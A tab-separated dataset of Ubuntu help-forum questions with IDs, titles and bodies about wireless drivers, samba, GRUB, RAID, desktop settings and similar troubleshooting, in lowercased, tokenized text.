90077	ndiswrapper driver loaded but not being used	i have a tp-link tl-wn851nd wireless card that does n't work properly ( slow and disconects from time to time ) with the regular ath9k driver . i tried to make it work with ndiswrapper and followed the steps here : https : //help.ubuntu.com/community/wifidocs/driver/ndiswrapper # downloading_windows_drivers sudo ndiswrapper -l shows : netathrx : driver installed device ( 168c:002d ) present ( alternate driver : ath9k ) i did sudo depmod -a , sudo modprobe ndiswrapper and sudo ndiswrapper -m with no errors . as suggested here : how to keep ndiswrapper configuration after reboot ? i checked with lsmod | grep ndiswrapper if it was loaded and i get this : ndiswrapper 254773 0 so , as i understand , everything is loading fine . however , if i do lspci -k i get this : 06:01.0 network controller : atheros communications inc. ar9287 wireless network adapter ( rev 01 ) subsystem : atheros communications inc. device 0300 kernel driver in use : ath9k kernel modules : ath9k so it seems that the system is still using the open source driver : s what i am doing wrong ?
90078	specific traffic analysis	in the recent days , my traffic increased rapidly . how can i check which application is responsible for that ?
90086	connecting to samba share works with smbclient , but does n't work with windows 7	i tried to share the directory /home/me/music with samba . the output of testparm on my server is as follows ( i think this is ubuntu 's default configuration , except for the [ share ] section ) : [ global ] server string = % h server ( samba , ubuntu ) map to guest = bad user obey pam restrictions = yes pam password change = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . unix password sync = yes syslog = 0 log file = /var/log/samba/log. % m max log size = 1000 dns proxy = no usershare allow guests = yes panic action = /usr/share/samba/panic-action % d [ printers ] comment = all printers path = /var/spool/samba create mask = 0700 printable = yes browseable = no [ print $ ] comment = printer drivers path = /var/lib/samba/printers [ share ] comment = my music files path = /home/me/music create mask = 0755 i used smbpasswd to give a passwort to the user friend . when i try to connect to the share from another ubuntu machine with smbclient , everything seems fine : smbclient -u friend //192.168.1.2/share i can call dir , and i see the content of the directory . however , when i want to connect the network drive from a windows 7 machine ( \\192.168.1.2\share with user workgroup\friend ) , i get the error that the network address is not reachable ( i can not tell the exact error message , because i have a german windows version ) . the error is misleading , because i can ping 192.168.1.2 from the windows machine . i guess i am not the first person to run into this , but googling for `` samba '' and `` network unreachable '' does n't help . i hope somebody can tell me what 's wrong with my config , and what 's the difference between running smbclient and connecting from windows .
90088	installing sun java jre , jdk ?	the os is returning an error upon attempting to install the sun java packages . i 've already uninstalled the openjdk packages and added these to the sources.list file : deb http : //us.archive.ubuntu.com/ubuntu/ oneiric multiverse deb http : //archive.canonical.com/ oneiric partner deb-src http : //archive.canonical.com/ oneiric partner but upon invoking installation the response is : enduser @ thispc : ~/desktop $ sudo apt-get install sun-java6-jdk sun-java6-jre reading package lists ... done building dependency tree reading state information ... done package sun-java6-jre is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package sun-java6-jdk is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'sun-java6-jdk ' has no installation candidate e : package 'sun-java6-jre ' has no installation candidate enduser @ thispc : ~/desktop $ am i adding the wrong targets to sources.list : thanks very much ,
90089	how do i install grub ?	i 'm trying to install ubuntu and i am getting an error message of unable to install grub in dev sda . then a dialogue box popped up that reads : sorry , an error occurred and it is not possible to install the bootloader at the specified location . how would you like to proceed ? choose a different device to install the bootloader on : continue without a boot loader . cancel the installation . ubuntu works off the disk but i keep getting the same error when i try to install it . does anyone know how to solve this ? thank you
90090	upgrading hardware ( gpu ) , will it work ?	in a couple of days , i will change my old nvidia quadro fx570 to nvidia gtx560ti and i 've been wondering if simply changing the gpu will work with my ubuntu or it will break my system/create conflicts , so , do i have to remove drivers or something before the change ? ps : i believe that quadro and geforce gpu families use different driver packages , im not sure how it works on linux tho = ) specs : ubuntu 11.10 x64 with gnome-shell drivers using at the moment : proprietary nvidia drivers @ `` nvidia accelerated graphics driver ( version current ) [ recommended ] '' thanks in advance , alexander .
90093	how do i remove login with samba ?	hey i set up a home server using ubuntu server 11.04 and i want to let all the computers in my house access the server through windows explorer and finder . but once its detected it asks for the username and password of the root user . is there a way i can just let anyone access it without a password . if not , can i then create a user for each person to have there own special server storage ? thanks in advance .
90096	is there a button for viewing the location bar in nautilus ?	i know i can go to 'dconf-editor ' if i want to always use the location bar in nautilus . but , i want a button to change to the location bar and the path bar easily and quickly . how do i make this button ?
90102	virtualbox does not work	virtualbox does not run on my ubuntu 11.10 32 bit os . when i type virtualbox in the terminal i get : keghn @ keghn-laptop : ~ $ virtualbox virtualbox : supr3hardenedmaingettrustedmain : dlopen ( `` /usr/lib/virtualbox/virtualbox.so '' , ) failed : /usr/local/lib/libsdl-1.2.so.0 : undefined symbol : directfbcreate . thanks for your help .
90109	gnome shell `` show desktop '' shortcut	i been thinking of anyone could guide me up , that in ubuntu 11.10 with gnome 3 , there is a option ctrl+alt+d to show the desktop by minimizing the current window . what i was thinking was that if i press ctrl+alt+d it will lead to desktop screen and when i press again ctrl+alt+d to go back to my working window.. as of now it doesnt work in this way ..is there any way out to do that same
90114	dejadup - clearing settings due to backup troubles	the problem i 'm using deja dup to back up my recently restored and upgraded ubuntu 11.10 machine . however , only one backup has ever succeeded ; in every subsequent backup , i was continually asked for my encryption password . it turns out that this is a previously fixed bug and , as such , i reported it as having potentially regressed . while i wait for a fix , however , this leaves me with a broken backup program that i ca n't use . because my system is somewhat unstable , i need this backup to work now ; it 's led me to look for workarounds . the potential workaround i 've inferred from this post that i can clear the settings for duplicity and deja dup by eliminating ~/.cache/duplicity and/or ~/.cache/deja-dup and my old backups . this will allow me to change the settings that are ( supposedly ) causing the bug and let me do backups normally . why i need your help to make the workaround work , i need to delete my old backups . my old backups are stored on the ubuntu one cloud . however , i ca n't figure how to delete files as there is n't a local copy . i know that there is an api call to do this , but there must be a more elegant way to delete these files . long story short ... how can i delete files on ubuntu one that have no local copy that can be manipulated ?
90118	ubuntu 11.10 logs off when clicking shutdown	as the title says : when i click shutdown from the menu it logs off . when i click shutdown from the log-in menu it does nothing . i 'm using a fresh install of ubuntu 11.10 . i can force it to shutdown by the command below , but i do n't want to keep typing that whenever i want to shutdown my laptop . sudo shutdown -h now so it 's probably processes which ar n't closing . i 'm a novice linux user , so i have no idea how to rule out the software causing this . i think it 's either gwibber/empathy , perhaps mozilla thunderbird , because this is happening since i started using this . so a few questions : how do i rule out what software is causing this ? how do i stop it from not closing on shutdown ? if 1. and 2. do n't work is it possible to add top command to the shutdown process ? edit : rourke here . somehow i can not accept the below comment from mech-e as the solution . thank you this was indeed the answer i was looking for !
90121	how to adjust screen brightness on dell inspiron mini 1010 ?	i just bought a used dell inspiron mini 1010 ... and when i hit the brightness buttons ( f4 and f5 ) it does nothing . is there a different way to adjust brightness , or how do i get these buttons to work ! i have tried hitting it while holding down the fn key as well , and it does nothing , please help !
90126	setting up remote access over a home network ?	so i have two computers ; one desktop and one laptop . both of these computers are running ubuntu 11.10 , and both are connected to the same wireless network . what i want to do is set things up to where i can use my laptop to remote access my desktop , from another room . i do n't need to be able to access it away from home , just to be able to control my desktop while sitting on the couch in another room . since i 'm fairly new to linux , i have pretty much no idea how to go about setting this up . any help would be appreciated .
90130	what 's kubuntu-full ?	during text install , it asked me what to install . along the well known kubuntu-desktop and many others , there was kubuntu-full . what 's it ?
90133	change windows from minimizing to corner in gnome 3	can the windows be set to minimize to a dock ? for example , im using gnome shell with unity 2d and i would prefer the windows to minimize to their respective launcher . example : instead of the open window minimizing to its icon in the launcher , it goes to the corner .
90134	indicator-weather hangs when trying to change location	i have always used weather indicator ( indicator-weather ) for all my weather-related needs on ubuntu , since 10.04 . i now use 11.10 and have indicator-weather installed from the ubuntu repositories . i recently moved from new orleans , louisiana to a town called central just outside of baton rouge , louisiana . i tried to removed my new orleans location and add my new one using the programs preferences dialog . it allows me to remove my current location , and even allows me to select `` central , louisiana , united states '' by entering `` central , la '' and hitting the `` search '' button . but when i do that , the application hangs and goes gray and never ever updates . this is driving me crazy . i can not seem to find how to manually change my location in any config file , although i do n't know much about this app and i am not sure where it stores this info . things i have tried so far include : change location as mentioned above use the more common `` baton rouge '' location choices using the same steps mentioned above . i have uninstalled the application and also uninstalled the dependency python-pywapi using both the sudo apt-get remove and the sudo apt-get purge commands and reinstalling the application . i did everything mentioned in # 3 and then restarted my system before re-installing . interestingly , after doing all of the above and then reinstalling the program , the first time i run it i am still greeted with my old location settings instead of being prompted to choose an new location ! i would also like to add that my wife is running ubuntu 10.10 and she was able to change her location data with no trouble whatsoever . the short version of this question would be : how do i change my location in weather indicator on ubuntu 11.10 ? any help would be appreciated . edit : i would also accept a solution that lets me re-install the application in a brand-new state so i could just add my location instead of adding a second one or removing the first one , etc .
90135	dlna servers cause wireless/data to drop	my data connection on my ubuntu 11.10 desktop ( integrated wireless ) keeps freezing/dropping . i have finally narrowed down the problem . it is some how caused by dlna servers i am running . i have tried serviio and ps3 media server . both cause the problem . sometimes the problem starts within seconds of transmitting data via dlna and sometimes it could take an hour or more . i am a noob to linux and ubuntu . i have checked logs and really do n't know what i am looking for . i see errors sometimes in the kern.log but not everytime and sometimes errors in other logs . i have to restart the os in order to get to data/wireless to work again . please help , i depend greatly on a dlna server . the last time it did this , this is what the kern log said : dec 20 04:46:13 ubuntu-media kernel : [ 2269.136128 ] phy0 - > rt2x00usb_vendor_request : error - vendor request 0x06 failed for offset 0x308c with error -110 . dec 20 04:47:03 ubuntu-media kernel : [ 2319.136115 ] phy0 - > rt2x00usb_vendor_request : error - vendor request 0x07 failed for offset 0x308c with error -110 . dec 20 04:47:53 ubuntu-media kernel : [ 2369.136114 ] phy0 - > rt2x00usb_vendor_request : error - vendor request 0x06 failed for offset 0x308c with error -110 . dec 20 04:48:43 ubuntu-media kernel : [ 2419.136125 ] phy0 - > rt2x00usb_vendor_request : error - vendor request 0x07 failed for offset 0x308c with error -110 . dec 20 04:49:33 ubuntu-media kernel : [ 2469.148113 ] phy0 - > rt2x00usb_vendor_request : error - vendor request 0x06 failed for offset 0x308c with error -110 . dec 20 04:50:23 ubuntu-media kernel : [ 2519.196112 ] phy0 - > rt2x00usb_vendor_request : error - vendor request 0x07 failed for offset 0x308c with error -110 . dec 20 04:51:13 ubuntu-media kernel : [ 2569.204115 ] phy0 - > rt2x00usb_vendor_request : error - vendor request 0x06 failed for offset 0x308c with error -110 . dec 20 04:52:03 ubuntu-media kernel : [ 2619.224115 ] phy0 - > rt2x00usb_vendor_request : error - vendor request 0x07 failed for offset 0x308c with error -110 . dec 20 04:52:41 ubuntu-media kernel : [ 2656.999742 ] init : smbd main process ( 915 ) killed by term signal dec 20 04:52:41 ubuntu-media kernel : [ 2657.001811 ] init : tty4 main process ( 934 ) killed by term signal dec 20 04:52:41 ubuntu-media kernel : kernel logging ( proc ) stopped .
90136	ubuntu 11.10 extend screen problem	i used to extend my screen with absolutely no issues on 11.04 but now i 'm only able to mirror displays , the error i am getting when i try to extend screen is this : please help me out with this ! thanks
90143	kde4 : move window to another workspace by dragging ?	i 'm trying to move a window to the adjacent workspace by dragging it , but when the window touches the edges , it enlarges and try to occupy the right half of the screen . is this behavior configurable in kde4 ? thanks !
90145	how do i install ubuntu 11 on a dell latitude e6400 with a sata hard disk ?	i downloaded ubuntu 11 , and after burning it to a dvd , i have been unable to install the os , i even had to change my sata configuration to ahci , or advanced host controller interface , reformat my hard disk , yet it wont install . please what do i do ?
90158	is there an image viewer that will save zoom settings across images/folders or use 100 % as default ?	it seems to me all the image viewers use a fit to screen approach that zooms out the images ... i can set the zoom to 100 % , but as soon as i switch images i have to do it again . i 'd rather not have it that way . this seems like something simple to do , is there a viewer that does it by default ?
90160	wired connection setting	my internet connection is 10baset-hd , in order to surfing the network , i have to type the command `` mii-tool -f 10baset-hd '' every booting . how can i make it auto-setting ?
90164	executing adb from php	i am trying to run adb from php using : exec ( 'adb devices ' , $ output , $ return_val ) ; but i get 126 error . i think the problem is that php is running as 'www-data ' user and does not have permissions to execute adb . any solutions ?
90168	backlight keyboard commands working on live cd but not on installed ubuntu	so basically when i put the ubuntu installation disc of ubuntu 11.10 inside and run a live session everything works fine ( i can press fn + arrow up and fn + arrow down to control the screen backlight ) . but after that i install the system , it doesnt work anymore ... but other commands ( like fn + arrow left for lowering the volume ) are working i 've installed latest nvidia propretary drivers ( and maybe thats the issue ? ) , coz i dunno what other drivers i could use waiting an answer
90170	ca n't boot into windows 7 after installing ubuntu	after installing ubuntu 11.10 , i ca n't boot into windows 7 . i have a new asus laptop and after installing ubuntu 11.10 , whenever i start my laptop , i get the dual boot menu ( it 's heading is : gnu grub ver . 1.99-12ubuntu5 ) . if i just wait without touching anything the computer boots into ubuntu , and i can start working . but if i choose the last row which reads : windows 7 ( loader ) ( on /dev/sda2 ) nothing happens , and after a while the computer boots into ubuntu . someone suggested to open a terminal , type sudo update-grub , and enter my password . that would do the job . i did that , but nothing changed . can anybody help me ? i have to state that my knowledge in ubuntu is close to zero .
90175	what are benefits of upgrading filesystem from ext2 ?	i have ext2 filesystem installed on my work machine . i talk with my friend who knows linux a lot better and he said its very old and its very weird that i use so old filesystem . i 'm now trying to get it updated ( i do n't have root ) to ext3 . are there any big reasons for that update ? so i can point them out to helpdesk . i 'm java programmer and i work on a very big project ( building the whole thing takes 50-90 minutes ) . it has a lot of small files that needs to be compiled and produce even more small files . so maybe an upgrade would help with the speed ? i also have problems with ... . freezing . sometimes my computer is freezing and after 5-25 minutes its works again ( i ca n't do anything , even switch to another console ) . can filesystem be responsible for that ? i 'm looking for any reasons for upgrade , the more reasons i have the bigger chance that it will be upgraded . p.s . how big are chances that i might lose data , because of errors in upgrade ? ( i have never done it on linux , but on windows its ... 4 % ? ) . i do have a ups . please keep in mind that those people seems to not be very good since i have ext2 and its a new machine ( 9 months old )
90189	on sleep , open processes are closed	i am using a dell inspiron 1525 . i have setup close-lid to sleep mode . on waking up from sleep , all my previously open processes have been closed and i am shown a blank desktop . any known solutions to this ? thanks .
90193	error : you need to load kernel first	i made a clean install on my sony vaio laptop , of ubuntu 11.10 and when the installation was ready , it prompted to remove the usb i was installing the distro from , and press enter to reboot . after this reboot the first thing i got was the following error : error : could n't read file error : you need to load the kernel first press any key to continue.. after that it throws me back to the grub select screen : ubuntu , with linux 3.0.0-14-generic-pae recovery mode previous linux versions ( none since i made a clean install ) memory test if i choose the first option it shows only a black screen and never loads anything . if i reboot the same thing happens . could i repair this using boot-repair ? is there any other way ? note : i know nothing about linux code so i am a total noob on this one update : boot-repair did not help grub.cfg here : http : //pastebin.com/gkluduhm boot info script : http : //pastebin.com/indarkkj
90194	defragmentation of ext2	is it worth it ? there is e2defrag . how long will it takes for 120gb ? 8h will be enough ? i would like to improve read/write on the hard disc . hard disc seems to be new ( 9 months old ) . its in my work machine , i 'm java programmer .
90196	mouse clicks automatically / raton hace clicks automaticos	good day friends , my problem is that my mouse clicks automatically and is getting on my nerves . i tried to do the solutioned mentioned here : press alt + f2 and type gnome-mouse-properties then press enter . go to accessibility tab and uncheck the option `` initiate click when stopping ... '' but my problem is that the accessibility tab is not there . buenos dias amigo tengo el problema de que mi raton da clicks automaticos y me fasidia mucho intente hacer la solucion que tu diste aqui . haga clic en alt + f2 y poner gnome-mouse-properties y pulsa enter . ir a la accesibilidad y desmarque la opci贸n `` iniciar haga clic en ... '' pero mi problema es q no me aparese la pesta帽a de accesibilidad me podrias ayudar porfavor
90197	what software is available for ipod synchronization ?	what software is available for ipod music , contacts and calender syncing with an ipod mini 2g ?
90204	what 's the difference between a compressed folder ( with files ) and a compressed tar archive ?	i do n't understand the use of tar . my understanding is it pulls together many files into one file . but does n't putting files in a folder do this ? using zip , i put files i want to archive in a folder and then compress the folder . do i also get an archive if i put files i want to archive in a folder and then compress with bzip2 ?
90205	recovering from swap lock	i 've had this problem come up a few times and google is n't my friend this time . is there a quick way to recover from a swap lock ? they can sometimes last twenty or more minutes which is a long time to wait if a hard reset is n't possible . the ideal solution that i 'm looking for is a utility that would halt all execution and pop up a task manager-style interface so unnecessary , memory-consuming processes can be killed . is there something like this , or another way to recover quickly ?
90210	`` kernel error , try with noapic option '' displayed when installing ubuntu	the pc configuration is : pentium4 intel , ddr2 256mb ram 533mhz ( but now i am upgrading it to 1gb ) whenever i tried to install ubuntu , it says `` kernel error , try with noapic option '' so what should i do now ? will an increase in ram help me ?
90212	firefox 9.0 loads apps tab despite preference not to load tabs	i upgraded firefox from 8.0 to 9.0 then 9.0.1 with regular updates iirc 8.0 version did not reload any tabs if set in general preferences , and 9.0 does not reload regular tabs but reloads apps tabs did someone else notice this ? i 'm i right that 8.0 startup time was immediate while 9.0 needs more time to become fully accessible because of reloading apps tabs ? if yes is there setting to tell not to reload apps tabs ?
90213	is there any way to make the alt-tab window changer pop up quicker in gnome-shell ?	i like the behavior of gnome-shell 's alt-tab window changer , but there is a slight delay when pressing alt + tab , which bothers me . is there any way to make it pop up immediately , or at least , decrease the delay ?
90214	how to set default program ?	can anyone help me on how to set the default program that i use ? i have tried to open system info -- > default program - > change my program , but it wo n't work , any idea ? or should i use the terminal ? i want to replace the default movie player with vlc media player because the current movie player is useless to me . thanks in advance .
90215	do i have a raid or not ?	i am building a new ( power ) system . mobo is a asus sabertooth 990fx . i 've installed : 1 500gb hd for the os and user accounts ( mounted at / ) three 2tb drive set up on the bios as a single raid0 ( mounted at /raid ) the issues is that i can not confirm the size of the raid from the mount point . when i look at the properties of /raid it tells me `` free space : unknown '' . i am unsure of the output i 'm getting from fdisk -l as this is my first foray into raid . fdisk is inconclusive and `` cat /proc/meminfo '' appears to indicate that i 'm not getting the memory i expect ( see below ! ) . any assistance will be greatly appreciated . bruce *********** fdisk -l output : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . warning : invalid flag 0x0000 of partition table 5 will be corrected by w ( rite ) disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009a55f device boot start end blocks id system /dev/sda1 384 3095388671 1547694144 fd linux raid autodetect /dev/sda2 3095389054 3128815103 16713025 5 extended warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 3907029167 1953514583+ ee gpt warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdc : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 3907029167 1953514583+ ee gpt disk /dev/sdd : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000bc319 device boot start end blocks id system /dev/sdd1 * 2152710 976768064 487307677+ 83 linux /dev/sdd2 124 2152709 1076293 5 extended /dev/sdd5 126 2152709 1076292 82 linux swap / solaris partition table entries are not in disk order disk /dev/mapper/pdc_beejhachf : 1602.0 gb , 1601953333248 bytes 255 heads , 63 sectors/track , 194759 cylinders , total 3128815104 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 65536 bytes / 196608 bytes disk identifier : 0x0009a55f device boot start end blocks id system /dev/mapper/pdc_beejhachf1 384 3095388671 1547694144 fd linux raid autodetect /dev/mapper/pdc_beejhachf2 3095389054 3128815103 16713025 5 extended partition 2 does not start on physical sector boundary . /dev/mapper/pdc_beejhachf5 3095389056 3128815103 16713024 82 linux swap / solaris disk /dev/mapper/pdc_beejhachf1 : 1584.8 gb , 1584838803456 bytes 255 heads , 63 sectors/track , 192679 cylinders , total 3095388288 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 65536 bytes / 196608 bytes disk identifier : 0x00000000 disk /dev/mapper/pdc_beejhachf1 does n't contain a valid partition table disk /dev/mapper/pdc_beejhachf5 : 17.1 gb , 17114136576 bytes 255 heads , 63 sectors/track , 2080 cylinders , total 33426048 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 65536 bytes / 196608 bytes disk identifier : 0x00000000 disk /dev/mapper/pdc_beejhachf5 does n't contain a valid partition table ************ cat /proc/meminfo output memtotal : 16405964 kb memfree : 14722300 kb buffers : 64496 kb cached : 709308 kb swapcached : 0 kb active : 886560 kb inactive : 391952 kb active ( anon ) : 505508 kb inactive ( anon ) : 712 kb active ( file ) : 381052 kb inactive ( file ) : 391240 kb unevictable : 0 kb mlocked : 0 kb swaptotal : 16713020 kb swapfree : 16713020 kb dirty : 552 kb writeback : 388 kb anonpages : 504664 kb mapped : 197904 kb shmem : 1512 kb slab : 96652 kb sreclaimable : 72460 kb sunreclaim : 24192 kb kernelstack : 2904 kb pagetables : 21804 kb nfs_unstable : 0 kb bounce : 0 kb writebacktmp : 0 kb commitlimit : 24916000 kb committed_as : 2080264 kb vmalloctotal : 34359738367 kb vmallocused : 334800 kb vmallocchunk : 34359391644 kb hardwarecorrupted : 0 kb anonhugepages : 0 kb hugepages_total : 0 hugepages_free : 0 hugepages_rsvd : 0 hugepages_surp : 0 hugepagesize : 2048 kb directmap4k : 138240 kb directmap2m : 4005888 kb directmap1g : 12582912 kb ************** grep memtotal /proc/meminfo output memtotal : 16405964 kb
90217	ca n't connect to wireless on a dell latitude 620	i have just installed ubuntu 11.10 on a dell 620 latitude . i am new to linux and am not very techie . i can not see how to connect to a wireless network . for the avoidance of doubt i can not 'see ' any available networks , nor any way to search for them . there is a strong network in range - i am using it to write this from another machine . i can make my way through : network connections > wireless ( tab ) > add i then get to a dialog box called : `` editing wireless connection 1 '' after that i am lost . nada . clueless . now , i have looked for similar problems in this forum and i see some . but i do n't understand the answers . thus : dell vostro 1510 ca n't connect to wireless -- how can i fix this ? so , please can you explain how to fix this step by step as if to an idiot please ?
90230	there is no `` connector : analog line-in '' on the input tab of sound preferences -- why not ?	i connected an analog tape deck to my soundblaster audigy analog line-in input . i have a 2 to 1 cable connecting the tape-out to the audigy-line-in . i ca n't hear any sound when the tape deck plays . i have no problem when on windows . how do i get the tape deck to play on ubuntu ?
90232	can not install libcurl4-openssl-dev unmet dependencies	i need to install libcurl-dev . when sudo apt-get install libcurl4-dev fails . reading package lists ... done building dependency tree reading state information ... done note , selecting libcurl4-gnutls-dev instead of libcurl4-dev some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libcurl4-gnutls-dev : depends : libkrb5-dev but it is not going to be installed or hurd but it is not installable depends : libldap2-dev but it is not going to be installed e : broken packages okay . so i tried to install libcurl4-gnutls-dev . again the error . $ sudo apt-get install libcurl4-gnutls-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libcurl4-gnutls-dev : depends : libkrb5-dev but it is not going to be installed or hurd but it is not installable depends : libldap2-dev but it is not going to be installed e : broken packages my system is 64bit kubuntu 10.04 lts . completely updated . question is how do i install libcurl-dev so that i have curl/curl.h ?
90233	ubuntu equivalent to dreamscapes ?	in windows vista ultimate , there was a feature called dreamscapes that let you set any wmv file as your desktop background and thereby have a moving desktop . there was a program that let users of windows 7 and other windows oss use dreamscapes by editing registiry values . is there any way i can set up a moving desktop similar to a dreamscapes in ubuntu 11.10 ? if so , how ? if not , is there any similar feature in ubuntu ? any help will be greatly appreciated . i am using unity and therefore the answer here does n't work .
90234	wrong keyboard layout on client pc when using synergy	i just installed ubuntu 11.10 in my new computer , the old one ( still main computer ) is ubuntu 10.04 . both pcs use `` spanish lam '' keyboard layout , the only difference is that the new pc keyboard has some multimedia keys but the configs are the same and the work well each one on each pc . but when i use synergy to use the main keyboard in the client pc ( 11.10 ) , the keyboard layout seems to be the `` enlglish ( us ) '' layout , or other but not `` spanish lam '' , while settings on both pcs remain as `` spanish lam '' . the other keyboard connected by cable to the client pc does work well with the spanish layout even when using synergy . any idea how to fix this ?
90236	no volume control in `` gnome classic '' sessions	i 've just installed oneiric ( 64-bit ) , and immediately after installation i followed this guide to get the gnome classic interface ( i 've tried unity ... i really wanted to like it , but it just never stuck ) . it seemed to go ok , but when i 'm in a gnome classic session , i have no volume control applet , and there does n't appear to be one in the add to panel list . the volume control is there when i 'm in a unity session with the same user . this may be similar to this question , but the circumstances seemed different enough to warrant a new question .
90237	unable right click on desktop ubuntu 11.10	after i installed the ccmm and i explored it . finnaly my mouse unable to right click . please give me solution . thank you very much .
90239	ca n't move window buttons to left ?	i have installed gnome-shell on ubuntu 11.10 and my buttons are on the right side now . i changed in gconf-editor -- > desktop/gnome/shell/windows/button_layout to close , minimize , maximize : , but there is no effect.. than i restarted gnome-shell few times and still nothing . if someone have some suggestion ?
90240	play windows games on ubuntu 11.10 ?	currently i am using ubuntu 11.10 and i have tried installing windows games with `` playonlinux '' but all the games i tried to install it displays an error ( it says that the program should be closed ) please what can i do ?
90254	can not change zsh prompt	for some reason i ca n't change my zsh prompt by typing , say , ps1= '' % # '' . i 'm using the admin-suggested config on ubuntu 11.10 . am i doing it wrong or is it a bug ? here 's the content of my ~/.zshrc : # set up the prompt autoload -uz promptinit promptinit prompt adam1 # ps1= '' `echo `` $ ps1 '' | tr kk ff` '' # ps2= '' `echo `` $ ps2 '' | tr kk ff` '' # ps3= '' `echo `` $ ps3 '' | tr kk ff` '' # ps4= '' `echo `` $ ps4 '' | tr kk ff` '' setopt histignorealldups sharehistory # use emacs keybindings even if our editor is set to vi bindkey -e # keep 1000 lines of history within the shell and save it to ~/.zsh_history : histsize=1000 savehist=1000 histfile=~/.zsh_history # use modern completion system autoload -uz compinit compinit zstyle ' : completion : * ' auto-description 'specify : % d' zstyle ' : completion : * ' completer _expand _complete _correct _approximate zstyle ' : completion : * ' format 'completing % d' zstyle ' : completion : * ' group-name '' zstyle ' : completion : * ' menu select=2 eval `` $ ( dircolors -b ) '' zstyle ' : completion : * : default ' list-colors $ { ( s. : . ) ls_colors } zstyle ' : completion : * ' list-colors '' zstyle ' : completion : * ' list-prompt % sat % p : hit tab for more , or the character to insert % s zstyle ' : completion : * ' matcher-list '' 'm : { a-z } = { a-z } ' 'm : { a-za-z } = { a-za-z } ' 'r : | [ ._- ] =* r : |=* l : |=*' zstyle ' : completion : * ' menu select=long zstyle ' : completion : * ' select-prompt % sscrolling active : current selection at % p % s zstyle ' : completion : * ' use-compctl false zstyle ' : completion : * ' verbose true zstyle ' : completion : * : * : kill : * : processes ' list-colors '= ( # b ) # ( [ 0-9 ] # ) *=0=01 ; 31' zstyle ' : completion : * : kill : * ' command 'ps -u $ user -o pid , % cpu , tty , cputime , cmd'
90256	why some webpages are not opening in firefox ?	i have installed ubuntu 10.04 on my desktop . i have successfully connected my bsnl broadband and can access internet . i have upgraded to firefox 8 . the problem is some webpages are not opening in firefox . pages like - yahoo.com , flickr.com , ubuntu forum pages etc and lots others are not opening but loading infinitely . i have also installed google chrome . but same thing is happening there also . my modem is configured in bridge mode . i have disabled ipv6 in firefox . please help .
90257	how can i see the unity changelog	right now i am using the 4.24.0 version of unity but i heard a 5.x version was released . where can i see the changelog for it
90260	how do i view files and folders in a list ?	there is not an edit | preferences option . how do i get the files to display in a list view with details , and not as icons ?
90261	how to upgrade to the latest unity	i am using the 4.24.0 version of unity and i would like to upgrade to the latest version . is it possible to upgrade to it without having to download and compile ( as per this q & a ) and if yes , how ? ( and what problems might occur if any ) note - i already looked into this question : how can i get the latest unity updates ? but it does not answer the question nor does it have any information about the latest . update - there is no 5.x released yet .
90262	how can i change dns servers ?	i have a ubuntu 11.10 machine , and i 'd like to change my dns servers . how do i do this ?
90264	reconfiguring the music lens for audacious	as much as i love banshee for managing my library , its a bit slow ( on my laptop ) to use as a media player when i just fancy listening to a song and it also lacks the plugins for enhancing the sound which audacious has . i was wondering if the music lens could be modified to still scan banshee 's library but to open the selected music in audacious instead ?
90265	how to share a torrent in ubuntu server	i have uploaded a huge iso file and i wish to share it in a torrent site ( i will not name names because then there will be no soup for me ) . how can i share this torrent file to others . using ubuntu server 11.10 and there is yet no torrent manager in the server . am looking for something terminal related ( since there is no gui ) .
90266	how to verify if an uploaded file was uploaded correctly	i have uploaded an iso file to my server via rsync . how can i verify it is correct ( not corrupted or something ) . this is just in case rsync had an problem .
90267	how to disable file transfer dialog integration with unity	is there a way to remove nautilus file transfer dialog from unity integration ? i mean , when using unity , if you copy some files from one place to another you can see that dialog window that shows the progress , and you can minimize or even close it that nautilus will still copy the files and unity will still show the progress status on the 'home ' icon . if you do n't use unity ( like me ) and do n't use gnome-shell or gnome-session-fallback too ( ubuntu unity session but unity plugin is disabled ) and you begin copy some files the dialog appears , but if you minimize or close the window , you ca n't restore it anymore . a little research led me to believe that this is because libunity , but i do not know what to do . i appreciate any help
